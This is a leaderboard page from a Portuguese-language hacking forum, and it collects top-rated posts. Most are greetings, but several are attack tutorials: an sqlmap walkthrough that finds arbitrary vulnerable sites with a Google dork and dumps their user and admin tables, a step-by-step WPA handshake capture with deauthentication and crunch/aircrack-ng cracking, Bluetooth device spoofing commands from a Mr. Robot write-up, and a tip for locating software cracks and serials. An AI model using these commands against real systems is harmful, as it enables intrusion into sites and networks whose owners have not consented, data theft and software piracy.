Ir para conteúdo

Tabela de Classificação


Conteúdo Mais Visto

Exibindo conteúdo com a maior reputação desde 20em todas áreas

  1. 2 pontos
    Bem vindo. É muito bom você aprender sobre tudo mas sugiro que foque em algo pois no que focar vai ser seu ponto mais forte. Com o tempo você fica bom em tudo mas se torna especialista em algo.
  2. 1 ponto
    Olá, Me chamo Matheus, na internet conhecido como coldTeus e atualmente estou cursando Design Gráfico, área no caso que eu sou apaixonado, mas, gosto de vários assuntos e de conhecer coisas novas e aprender também, espero ter uma boa estádia aqui no fórum.
  3. 1 ponto
    Nao adianta encriptar a hd se a memoria entrega tudo inclusive a hash do usuario kkk. Otima palestra
  4. 1 ponto
  5. 1 ponto
    Quero saber mais sobre seguranca da informação:
  6. 1 ponto
    A conta fica logada por que sua sessão fica aberta no servidor deles. Não há armazenamento das credenciais na sua máquina a não ser que você escolha salvar naquela "caixa de mensagem" ou esteja com algum keylogger.
  7. 1 ponto
    Tenho um pequeno pronto, mas não tenho mais permissão nessa área do fórum. Adm me dá um toque aí onde devo postar.
  8. 1 ponto
    Ataque MAN-IN-THE-MIDDLE no Android com zANTI Neste vídeo é ensinado, a fazer a realização de um ataque de MITM com o aplicativo zANTI, requer root.[/align] ######################################
  9. 1 ponto
    Olá haskers, dboa? Esse e o primeiro post da serie "mobile hacking", que vai ser uma serie onde eu ensino a fazer diversos ataques utilizando o celular chega do verde Bom vou responder primeiro a algumas possíveis perguntas: 1 - Vou poder fazer isso no meu iPhone / Windows Phone? Poder você até pode, mas eu não vou ensinar aqui (), tudo que eu for passar nessa serie é limitado ao Android, por ser Linux Based (Não me venha com: "mas WP é windows", se disser isso eu te haskeio). Então se você for usuário de outro sistema que não seja o Android e está muito interessado em hackear pelo celular, adquira um, se precisar de ajuda na escolha sinta-se livre para me mandar uma mensagem 2 - Ah mas você só vai me ensinar a mexer no terminal ou fazer coisas que eu já sei fazer no Desktop só que pelo celular?? Sim, mas não é tão simples quanto parece, diversos requerimentos pra rodar alguns scripts (como libs por exemplo) não estão presentes no Android nativamente, vou ensinar como "instalar" tais requerimentos para poder utilizar dos scripts... 3 - Eu preciso ter root no meu celular?? Nesse primeiro tutorial não, mas nos próximos sim, pois iremos trabalhar com a edição de pastas do sistema do Android que vem nativamente bloqueadas e só podem ser acessadas após o root. 4 - Eu vou conseguir fazer o que o Elliot fez na serie na parte da delegacia? Sim, mas eu vou segurar bastante esse tutorial :3 Bom vamos ao tutorial Recomendo bastante atenção, um movimento errado e seu celular pode virar uma mini ogiva nuclear de alta potencia e gerar uma grande devastação... (fecha essas pornografia aí) Vamos precisar dos seguintes apps: Termux: https://play.google.com/store/apps/details?id=com.termux&hl=pt_BR Termux:API (para ter acesso ao APT) https://play.google.com/store/apps/details?id=com.termux.api&hl=pt_BR Observação: O Termux só está disponível para os celulares com versão 5.0 ou superior do Android, caso não esteja nessa versão mais queira tentar do mesmo jeito utilize esse app : https://play.google.com/store/apps/details?id=com.gnuroot.debian&hl=pt_BR (Podem haver alguns erros durante o procedimento, comenta aí que eu ajudo) E por ultimo o meu preferido por causa do nome Hacker's Keyboard https://play.google.com/store/apps/details?id=org.pocketworkstation.pckeyboard&hl=pt_BR É um teclado comum que possui coisas de um teclado de Desktop como Shift, Tab e outros... Vamos aos procedimentos Após instalar tudo da lista acima, abra o Termux e digite: apt update pode acontecer de ele dizer que o apt ainda não foi instalado, mas aí você digita isso: apt install apt (É sério '-') depois de "ativar" o nosso amigo apt, iremos instalar o python digite: apt install python e depois apt install python3 (para futuros tutoriais) Agora que temos o Pitão, vamos descolar aquele SQLmap deliciouser no termux digite: apt install git depois, vamos clonar o Rep do Sqlmap digite: git clone https://github.com/sqlmapproject/sqlmap.git quando o download terminar e você for capaz comandar esse cavalo silvestre que chamamos de terminal digite: cd sqlmap-master e pronto, se você já souber fazer ataques SQLi você já tem tudo necessário. caso não saiba aqui vai um quick tutorial (tutorial rápido em coreano)... Digite: python sqlmap.py Só pra ter certeza que está tudo ok. Depois selecione um site alvo (não tente google plmds) uma dork pra achar alvos é essa: "inurl: php?id=", Joga isso no google que é sucesso Para saber se um site pode ou não ser vulnerável adicione uma aspa no final da url, por exemplo sitedopao.com.br/index.php?id=101 você coloca uma aspa no final sitedopao.com.br/index.php?id=101' e dá enter Se der algum erro de php, há uma chance de vulnerabilidade... Voltando ao termux Digite: python sqlmap.py -u sitedopao.com.br/index.php?id=101 --dbs Esse "-u" é pra determinar que o que vem a seguir é a url do site a ser explorado o "-dbs" é pra determinar o que você quer que o SQLmap faça, nesse caso --dbs é para testar o site e trazer o nome das DB's nele presente Depois digite: python sqlmap.py -u sitedopao.com.br/index.php?id=101 -D "nome da DB vem aqui" --tables Esse "-D" é pra determinar que o que vem a seguir é a Database a ser explorada o "--tables" é para testar o site e trazer o nome das tables que estão na DB And after that, type: python sqlmap.py -u sitedopao.com.br/index.php?id=101 -D "nome da DB" -T "nome da tabela" --columns Esse "-T" define a tabela da DB a ser explorada o "--columns" é pra determinar que você quer saber as colunas presentes nessa tabela e por ultimo: python sqlmap.py -u sitedopao.com.br/index.php?id=101 -D "nome da DB" -T "nome da tabela" -C "nome da coluna" --dump o "--dump" é pro SQLmap tentar trazer o conteúdo das tabelas **** Para pegar o conteúdo de múltiplas tabelas e só colocar "-C tabela1,tabela2,tabela3(...)tabela8008" **** Se você for ixpertinho vai procurar coisas que tenham "user", "admin", "login" e tals Mas como sempre eu tenho que te lembrar que invadir sites assim é crime, faça isso com permissão do dono do site ou procure um site de testes como por exemplo o http://testphp.vulnweb.com/ Não me responsabilizo pelos seus atos Então é isso guys, acho que amanhã saí o "Aventuras de um hasker #1" e o Mobile Hacking #2 Me digam o que acharam!! avaliem e deem criticas.... flws ~~ Bjs do Ja1
  10. 1 ponto
    Quero muito me tornar um bom hacker, e ter um conhecimento vasto.
  11. 1 ponto
    seja bem vinda! E lembre-se: o hacker é um conhecedor de muitas coisas. Pensando fora da caixa e buscando conhecimento você chega longe. Boa sorte.
  12. 1 ponto
  13. 1 ponto
  14. 1 ponto
    olá mundo, sou Winshaw. Será ótimo poder contribuir com o fórum e me juntar ao grupo. Vamos juntos nessa busca por cada vez mais conhecimento!
  15. 1 ponto
    então mano puxei as info do proprio site do sindicato usando o perl depois transformei em db para manipular no delphi \o
  16. 1 ponto
    Espero ter esclarecido um pouco...
  17. 1 ponto
    Mais duvidas. Abre a documentação. Linguagem um pouco xata, mas tá tudo lá!
  18. 1 ponto
    Enviar e-mails com o Excel pode ser feito de diversas maneiras, utilizando Outlook, encaminhando para a sua página de e-mail, ou como dissemos, enviar diretamente pelo próprio programa, sem nenhum esforço adicional. Este último, claro, é o melhor, então será ele que vamos aprender. Como você já deve ter imaginado, este processo será possível através de um código VBA. Então, vamos ao de sempre: Aperte Alt + F11 para entrarmos na janela de edição de VBA’s. O primeiro passo é ir até “Ferramentas”, depois “Referências” e vamos correr a lista para baixo até encontrar “Microsoft CDO for Windows 2000 Library”. Marque e dê o OK. Agora vamos criar um módulo clicando com o botão direito em “VBAProject”, depois em “Inserir” e então “Módulo”. Nesta janela de módulo vamos colar o seguinte código 'Baseado no código disponibilizado em http://guiadoexcel.com.br/ Function EnviaEmail() Dim iMsg, iConf, Flds Set iMsg = CreateObject("CDO.Message") Set iConf = CreateObject("CDO.Configuration") Set Flds = iConf.Fields schema = "http://schemas.microsoft.com/cdo/configuration/" Flds.Item(schema & "sendusing") = 2 'Configura o smtp Flds.Item(schema & "smtpserver") = "smtp.gmail.com" 'Configura a porta de envio de email Flds.Item(schema & "smtpserverport") = 465 Flds.Item(schema & "smtpauthenticate") = 1 'Configura o email do remetente Flds.Item(schema & "sendusername") = "[email protected]" 'Configura a senha do email remetente Flds.Item(schema & "sendpassword") = "senha do seu e-mail" Flds.Item(schema & "smtpusessl") = 1 Flds.Update With iMsg 'Email do destinatário .To = "[email protected]" 'Seu email .From = "[email protected]" 'Título do email .Subject = "Isto é um teste de Envio de e-mail" 'Mensagem do e-mail, você pode enviar formatado em HTML .HTMLBody = "Mensagem enviada com o gmail" 'Seu nome ou apelido .Sender = "Teste" 'Nome da sua organização .Organization = "Aprender Excel" 'e-mail de responder para .ReplyTo = "[email protected]" 'Anexo a ser enviado na mensagem. Retire a aspa da linha abaixo e coloque o endereço do arquivo .AddAttachment ("c:/fatura.txt") Set .Configuration = iConf .Send End With Set iMsg = Nothing Set iConf = Nothing Set Flds = Nothing End Function Sub disparar() EnviaEmail MsgBox "O e-mail foi disparado com sucesso!", vbOKOnly, "e-mail enviado" End Sub Após colar o código no seu Excel veja que diversas linhas ficarão verde, pois são linhas que o código ignorar. Ou seja, são linhas comentários, que lhe dizem para que server a linha imediatamente abaixo. Por exemplo 'Configura o email do remetente Flds.Item(schema & "sendusername") = "[email protected]" Ali onde está o meu e-mail (entre aspas) você irá colocar o seu e assim por diante. Atente para o campo remetente, senha, destino, corpo do e-mail, etc. Detalhe: As configurações de Smtp e porta de envio do e-mail DESTE POST estão de acordo com o GMAIL. Se você usa outro serviço irá ter de adaptar às necessidades do mesmo. Se você colocou tudo certinho então seu envio já estará configurado e fará o disparo toda vez que você disparar o mesmo. Sugiro que você crie um botão e coloque o atalho para o disparo. Assim é só clicar no botão e fazer o disparo automaticamente. Se você não sabe como fazer isso, confira um passo a passo rapidinho clicando aqui. Detalhe 2: Como dissemos, o código está otimizado para o Gmail, e o serviço de e-mail do Google tem uma camada extra de proteção. Na primeira vez que você tentar enviar um e-mail pelo Excel vai receber um e-mail com a seguinte mensagem: Conteudo retirado do seguinte endereço: https://www.aprenderexcel.com.br/2017/vba/enviando-e-mail-diretamente-pelo-excel Porra já precisei disso a algum tempo atras, para um cliente. Que coisa chata!!!
  19. 1 ponto
    Olá, apos muita peregrinacao e leitura nos mais diversos foruns nacionais e internacionais estou efetuando meu registro aqui na fsociety Brasil. Nao costumo ser um usuario muito ativo em foruns pois sei da dificuldade de encontrarmos por vezes pessoas dispostas e trocar ideias e a resolver problemas, apesar de muitos dizerem o contrario. Sim, tenho meu grupo pessoal de amigos(as) em que tratamos de diversos temas e discucoes, sempre de forma a ajudar-nos uns aos outros nos mais diversos temas. Acredito que minha principal motivacao sempre foi discutir e trocar ideias e informacoes sobre a internet e como podemos fazer o melhor uso possivel dela, sempre focando no que acredito ser a maior virtude da rede: LIBERDADE. Sou ferrenho apoiador de uma internet livre, sem amarras de governos e operadoras e defencor da privacidade acima de tudo. Trabalho com tecnologia a alguns bons anos, focado nesse momento na area de infraestrutura. Espero que possa ajudar e ser ajudado a fortalecer o forum, pois creio eu que aqui seja um canal central muito oportuno para tais discucoes. Desculpem a grande introducao mas gostaria de dar um "Ola mundo" um pouco mais relatado do que apenas dizer que sou Fulano. Abraco a todos e uma otima navegacao. ;)
  20. 1 ponto
    Mr. Robot, episódio 6. Como de costume, não decepcionante. Mais uma vez, nosso herói, Elliot, usou seu extraordinário intelecto e habilidades de hacking para nos inspirar. Neste episódio, Elliot está sendo chantageado pelo traficante de drogas implacável, Vera, para tira-lo da prisão. Shayla esta sendo refém e Elliot tem até a meia-noite para invadir o sistema de computador da cadeia para liberá-lo. Elliot tenta explicar a Vera que tal invasão não pode ser feita em questão de horas, mas sim dias ou semanas para encontrar uma vulnerabilidade de segurança que ele possa explorar. Pendrive malicioso Em sua primeira tentativa de invadir a prisão, Elliot e Darlene, sua parceira da Fsociety, "acidentalmente" deixam cair pendrives infectados perto da prisão. A estratégia aqui é que se alguém dentro da rede da prisão pegar um e inseri-lo no seu sistema de computador, irá ter injetado um malware e assim dando uma entrada para Elliot. Como esperado, um oficial pegou um e inseriu em seu computador. Elliot foi capaz de ter uma conexão remota, mas antes de poder fazer qualquer coisa, o software AV (antivírus) detecta a intrusão e desconecta Elliot. Elliot então questiona Darlene por ela ter pego um malware já conhecido (pelos antivírus, no caso), ao invés de desenvolver um próprio malware e então Darlene se defende dizendo que só tinha meia-hora. A rede Enquanto Elliot está visitando Vera na prisão, ele traz seu telefone com ele, no qual ele instalou um aplicativo de scanner Wi-Fi. Com esse scanner, ele pode ver todos os APs sem fio e vê que todos estão usando WPA2. Embora ele saiba que pode quebrar WPA2, porem o tempo é curto para que ele possa fazer um bruteforce na rede. No processo de descoberta de hotspots sem fio e tecnologias de criptografia com seu telefone, Elliot vê uma conexão Bluetooth quando o carro de um agente passa perto dele. Isso estimula Elliot a uma nova estratégia, invadir o Bluetooth e entrar no sistema de computador da prisão através da conexão dedicada do carro da policia à prisão. A estratégia de Elliot aqui é falsificar a conexão Bluetooth do carro da polícia com o teclado. Se ele pode fazer o laptop acreditar que seu teclado é realmente o teclado do policial, ele pode controlar o laptop do policial e entrar na rede da prisão. Uma vez dentro da rede, ele pode enviar malware para assumir o controle dos sistemas controlados digitalmente da prisão. Ativando o Bluetooth Antes que Elliot possa fazer qualquer coisa, ele precisa habilitar o Bluetooth em seu sistema: service bluetooth start Em seguida, ele precisa ativar o dispositivo Bluetooth: hciconfig hci0 up Então ele verifica se ele realmente está funcionando, digitando: hciconfig hci0 Observe o "Endereço BD" na segunda linha - este é o endereço MAC do dispositivo Bluetooth. Procurando dispositivos Bluetooth A primeira coisa que Elliot no processo de invasão é procurar conexões Bluetooth. Se você olhar de perto a tela de Elliot, você pode ver que ele está usando o hcitool, uma ferramenta de configuração Bluetooth integrada no Kali Linux. Embora isso funcione, tive um melhor desempenho com o btscanner, um scanner Bluetooth. Para usá-lo, digite: btscanner Em seguida, selecione "i" para iniciar uma verificação de inquérito. Você pode ver os resultados abaixo. Usando o btscanner, podemos obter uma lista de todos os dispositivos Bluetooth por perto. Este aqui tem um endereço MAC e um nome de "Tyler" - para falsificar este dispositivo, devemos falsificar o endereço MAC e o nome do dispositivo. É assim que Elliot recebe o endereço MAC e o nome do dispositivo Bluetooth do carro do policial. Lembre-se de que o Bluetooth é um protocolo de baixa potência com um alcance de apenas cerca de 10 metros (embora com uma antena direcional, distâncias até 100 metros foram alcançadas). Spoof o endereço MAC do teclado Agora que Elliot tem o nome e o endereço MAC do teclado do policial, ele precisará clonar o teclado do policial com essas informações. O Kali Linux possui uma ferramenta projetada para spoof de dispositivos Bluetooth chamados de spooftooph. Podemos usá-lo para falsificar o teclado com um comando semelhante a este: spooftooph -i hci0 -a A0:02:DC:11:4F:85 -n Car537 -i Determina o dispositivo, neste caso hci0 -a Determina o endereço MAC que queremos falsificar -n Determina o nome do dispositivo que queremos falsificar, neste caso "Car537" Se o fizermos corretamente, nosso dispositivo Bluetooth irá falsificar o endereço MAC e o nome do dispositivo Bluetooth do computador do policial. Para verificar se foi bem sucedido, podemos usar o hciconfig seguido do dispositivo e o "nome" do switch que irá listar o nome do dispositivo. Lembre-se, este é o nosso dispositivo Bluetooth que estamos tentando emular com o dispositivo Bluetooth do carro de polícia. Se tivermos sucesso, ele terá o mesmo endereço MAC e o nome do dispositivo Bluetooth do policial. hciconfig hci0 name Agora, temos um dispositivo Bluetooth que é um clone perfeito do teclado Bluetooth do carro da polícia! O link do serviço bluetooth para o laptop do policial Agora é aqui onde o roteiro e realidade de Mr. Robot se divergem. O hacking de Mr. Robot é realista, porém as vezes, o diretor precisa deixar as coisas um pouco mais fictícias. E isso é permitido pois as obras não devem se limitar pela realidade. Para que o Eliot se conecte agora ao laptop do carro de polícia, ele precisaria da chave de link (esta é uma chave para identificar o dispositivo Bluetooth previamente emparelhado) que foi trocada entre o teclado e o adaptador Bluetooth no laptop. Ele poderia adivinhar (improvável) ou crack-lo, mas não será tão rápido como apareceu no show. Outra possibilidade é que, quando o sistema foi reiniciado ou o teclado foi desconectado, Elliot pode se conectar ao laptop, pois é um clone do teclado do policial. Em ambos os casos, levaria mais tempo do que Elliot tinha neste episódio para cortar o teclado Bluetooth do policial. Hackeando a prisão Na etapa final, Elliot usa o computador hackeado do policial para fazer upload de um malware via FTP, que lhe dará o controle das portas das celas da prisão. Poucas pessoas sabem que prisões e outros sistemas industriais, muitas vezes usam SCADA (Sistemas de Supervisão e Aquisição de Dados). Estes sistemas industriais possuem PLCs. Presumivelmente, essa prisão tinha PLCs controlando as portas das celas da prisão (uma suposição muito razoável) e o malware de Elliot infectou-os e lhe deu controle, permitindo-lhe abrir todas as celas, liberando Vera e todos os outros prisioneiros.
  21. 1 ponto
    eai galera beleza? vim aqui compartilhar esse esquema com vocÊs, pois não sei vocÊs mais eu prefiro usar o kali instalado no HD, por isso tenho um HD para o kali e um para o windows espero que esse conteúdo de alguma forma ajude algum de vocÊs VLW.
  22. 1 ponto
    Caso você não conheça o biohacking, vou simplificar nesse tópico para você Biohacking é a prática de hackear o próprio organismo com o objetivo de melhorar a performance. A palavra biohacking combina o prefixo bio, que significa vida, com hacking, que vem da computação. Hackers são indíviduos que se dedicam a achar falhas nos sistemas, de forma a invadí-los. São pessoas com profundo conhecimento em programação, na maioria das vezes autoditadas, que decodificam até as mais complexas estruturas de informação. No caso dos biohackers, a expressão é uma combinação de estudos biológicos com a chamada cultura hacker. Um biohacker utiliza também de tecnologia de ponta na sua busca por entender e modificar a composição organismos e códigos genéticos, de forma a explorar mais a capacidade do corpor e criar super-humanos. A maior parte dos biohackers tem seu foco na produtividade dos seres humanos. Estão em busca de resultados superiores em termos de rentabilidade, aproveitamento das horas de sono, e até mesmo da possibilidade de visão noturna e correção de outros problemas oculares como a cegueira. As pesquisas dos biohackers são feitas, na maioria das vezes, de forma independente e até mesmo caseira. Não estão necessariamente dentro de grandes laboratórios biogenéticos, mas dentro de seus quartos ou garagens, como é próprio da cultura hacker. Entre os biohackers, existem aqueles que investem nas modificações corporais. As mais comuns e popularmente estudadas são a implantação de um chip que faz a leitura de sensores de proximidade, um imã aplicado na ponta dos dedos que serve para a leitura de ondas magnéticas, e até mesmo um super chip que faz a leitura da temperatura corporal e envia para um smartphone periodicamente. Essas modificações são feitas por meio de procedimentos invasivos, mas nem sempre realizados por uma equipe médica. Os imãs na ponta dos dedos, por exemplo, têm se tornado populares e podem ser aplicados por profissionais da área de piercings e body modification.
  23. 1 ponto
    Nao estou conseguindo acessar as pastas do repositorio!!
  24. 1 ponto
    ----------------COLOQUE A PLACA DE REDE EM MODO DE MONITORAMENTO---------------- # airmon-ng start wlan0 ----------------MONITORE A REDE E ESCOLHA UM INDIVIDUO-------------------------- # airodump-ng wlan0mon # ^C ---------------COM O ALVO ESCOLHIDO -------------- # airdump-ng -c (channel da vitima) --bssid (bssid da vitima) wlan0mon -w --------------EM OUTRO TERMINAL ----------------- # aireplay-ng -0 100000(este e o numero de vezes que ele vai derrubar todo mundo da rede) -a (bssid da rede) wlan0mon --ignore-negative-one -----------------VOLTE AO PRIMEIRO TERMINAL E OBSERVE SE O HANDSHAKE FOI CAPTURADO--- [OBSERVE ESTA PRIMEIRA LINHA] CH 5 ][ Elapsed: 18 s ][ 2017-11-04 16:00 ][ WPA handshake: (bssid) O HANDSHAKE FOI PEGO PARE O ATAQUE DER DESAUTENTICACAO NO ULTIMO TERMINAL ABERTO # ^C -------------AGORA DIGITE ------------------ # crunch 8 10 1234567890abcdefghi|aircrack-ng '/root/marilene-01.cap' -w - -e Marilene os primeiros numeros deste comando sao para especificar o tamanho das senhas no caso de 8 ha 10 [e o tamanho das senhas os outros sao os caracteres usados para gerar as senhas [1234567890abcdefghi] o | é para inificar os comandos digite aircrak-ng o caminho do arquivo do handshake -w e - para informar a worlist, que vai ser gerada e testada ao mesmo tempo com o crunch e -e para especificar o ESSID da rede que nocaso se chama Marilene. espere e FIM -- by Carlos Daniel
  25. 1 ponto
    Ele é um sistema operacional focado em segurança de sistemas Wireless. Você irá encontrar muitas ferramentas nele, como Aircrack-ng, Fluxion, Linset e muitos outros. E bem, ele pode sim quebrar, desde que saiba usar corretamente.
  26. 1 ponto
    Tutorial básico de como achar cracks/seriais de programas: 1. Vá no google e digite 2. 94fbr NOMEDOPROGRAMA 3. O resultado mostrara links do programa com crack e seriais Exemplo: 94fbr photoshop CS6
  27. 1 ponto
    Pessoal, há uma semana enviei uma proposta de Ideia legislativa para o Senado Federal e hoje tive a minha bendita resposta sobre a dita cuja, trata-se de uma ideia anti monopólio estatal dos correios. Eles aprovaram mesmo eu tendo mandado uma parte irônica. Acho que é de utilidade e interesse de todos o fim do monopólio dessa bosta. https://www12.senado.leg.br/ecidadania/visualizacaoideia?id=71245
  28. 1 ponto
    Eu ja conhecia o Koshimaru Kisara, recomendado² <3
  29. 1 ponto
    Vocês ja devem estar enjoados de saber que nós temos o nosso lindo repositorio certo? Mas então pra quem nao sabe, vamos la. Você acha que vira pentester de uma hora pra outra? Sem estudar apenas vendo tutoriais no youtube? Vc esta errado, um pentester estuda toda hora,sem parar nunca, porque? Pois toda hora temos falhas novas, desenvolver ferramentas e tudo mais. Qual sua desculpa para não estudar? Venha conhecer nosso repositorio! Todo material que vc quiser provavelmente nós temos! Link para Download no repositório:: http://pc.cd/VfbotalK Link para Upload no Repositório: https://goo.gl/5q06O6 Senha do Repositório:: issonaoehumasenha5/9
Esta tabela de classificação está definida como São Paulo/GMT-03:00
×
×
  • Criar Novo...

Informação Importante

Ao usar este site, você concorda com nossos Termos de Uso.